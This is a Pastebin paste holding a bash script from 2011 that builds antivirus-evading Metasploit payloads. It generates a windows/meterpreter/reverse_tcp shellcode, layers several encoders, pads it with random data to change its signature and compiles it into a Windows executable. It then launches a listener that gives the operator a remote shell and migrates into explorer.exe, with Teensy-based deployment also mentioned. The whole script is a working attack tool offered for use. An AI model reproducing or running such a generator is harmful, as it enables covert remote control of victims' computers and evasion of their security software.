Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # source : http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
- # To install the following if they are not installed :
- # apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
- echo "************************************************************"
- echo " Automatic shellcode generator - FOR METASPLOIT "
- echo " By Astr0baby 2011 "
- echo " With some Randomic gravy and sauce to bypass Antivirus "
- echo " For Automatic Teensy programming and deployment "
- echo "************************************************************"
- rm -rf ShellCode
- echo "Here is a network device list available on yor machine"
- cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
- echo -e "What network interface are we gonna use ? \c"
- read interface
- echo -e "What Port Number are we gonna listen to? : \c"
- read port
- echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
- read seed
- echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
- read enumber
- # Get OS name
- OS=`uname`
- IO="" # store IP
- case $OS in
- Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
- *) IP="Unknown";;
- esac
- #echo "$IP"
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw | ./msfencode -e x86/shikata_ga_nai -c $enumber > test.c
- mkdir ShellCode
- mv test.c ShellCode
- cd ShellCode
- #Replacing plus signs at the end of line
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
- echo "#include <stdio.h>" >> temp
- echo 'unsigned char ufs[]=' >> temp
- for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
- sed -i 's/$/"/' temp2
- sed -i 's/^/"/' temp2
- echo ';' >> temp2
- cat temp2 >> temp
- cat ready.c >> temp
- mv temp ready2.c
- echo ";" >> ready2.c
- echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
- mv ready2.c final.c
- echo 'unsigned char tap[]=' > temp3
- for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
- sed -i 's/$/"/' temp4
- sed -i 's/^/"/' temp4
- echo ';' >> temp4
- cat temp4 >> temp3
- cat temp3 >> final.c
- #Cleanup
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c
- rm -f temp2
- rm -f temp3
- rm -f temp4
- /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
- mv final.exe $RANDOM.exe
- filex=`ls -ct1 | head -1`
- sumx=`sha1sum $filex`
- echo $filex "...generated in ShellCode subfolder"
- echo $filex "sha1checksum is .." $sumx
- strip --strip-debug $filex
- cd ..
- echo " starting the meterpreter listener..."
- sleep 2
- ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement